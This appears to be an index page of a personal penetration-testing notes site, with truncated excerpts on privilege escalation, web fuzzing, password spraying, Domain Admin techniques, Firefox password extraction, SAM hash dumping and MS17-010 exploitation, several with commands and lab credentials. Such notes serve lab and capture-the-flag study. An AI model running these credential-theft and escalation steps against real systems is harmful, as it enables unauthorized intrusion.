Shuciran Pentesting Notes

SeImpersonatePrivilege

JuicyPotato The tool takes advantage of the SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege if enabled on the machine to elevate the local privileges to System. Normally, these privileges ...

Web Fuzzing

WFUZZ Basic Fuzzing: wfuzz -c -t 200 --hc 404 -w /usr/share/seclists/Discovery/Web-Content/IIS.fuzz.txt -u http://10.10.10.203/FUZZ Examples: Worker [[StreamIO#^a1b013]] Subdomain fuzzing: wfuzz...

MSSQL (tcp-1433)

Connection impacket-mssqlclient sa@10.11.1.31 -p 1433 -db tempdb # Sometimes you need to specify Windows Authentication impacket-mssqlclient Archetype/sql_svc:M3g4c0rp123@10.129.95.187 -windows-...

Password Spraying

Crackmapexec While executing a Password Spraying attack with crackmapexec, always use the --continue-on-success flag, since there are cases where two users have the same password cr...

Creds.xml

In order to create an XML file with credentials via PowerShell we can run the following commands: C:\Users\nico\Desktop> $credential = Get-Credential C:\Users\nico\Desktop> $credential | Exp...

Domain Admin Techniques

This is a collection of techniques to obtain Domain Admin. Assign user to a group Import-Module ./PowerView.ps1 $SecPassword = ConvertTo-SecureString 'JDg0dd1s@d0p3cr3@t0r' -As...

Firefox Cache Passwords

Firefox Cache passwords First go to the Firefox profile directory for the user: # For Windows: C:\\Users\\nikk37\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\br53rxeg.default-release # For Linux /.mozi...

RDP Remote Login

RDP into a remote machine XFREERDP To access a Windows system via port tcp-3389: /u - user /p - password /w - width /h - height /v - remote machine xfreerdp /u:JohnDoe /p:Pwd1...

Dumping SAM

Traditional dumping In order to dump the SAM, two registry keys must be retrieved: reg save hklm\sam c:\sam reg save hklm\system c:\system You need to use impacket-secretsdump to retrieve hash...

MS17-010

IIS 5.0 To exploit an IIS 5.0 server, the zzz_exploit.py script found here: MS17-010 is the best choice. First of all we need to create a virtual environment with python as t...